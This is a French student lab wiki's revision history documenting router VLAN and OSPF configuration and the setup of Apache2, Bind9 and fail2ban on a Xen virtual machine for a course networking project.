Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban<br />
<br />
# apt-get install fail2ban</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35350
TP sysres IMA2a5 2016/2017 G1
2016-11-21T17:00:35Z
<p>Dfourny : /* Bind9 */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35349
TP sysres IMA2a5 2016/2017 G1
2016-11-21T16:59:52Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35329
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:44:12Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35328
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:39:54Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
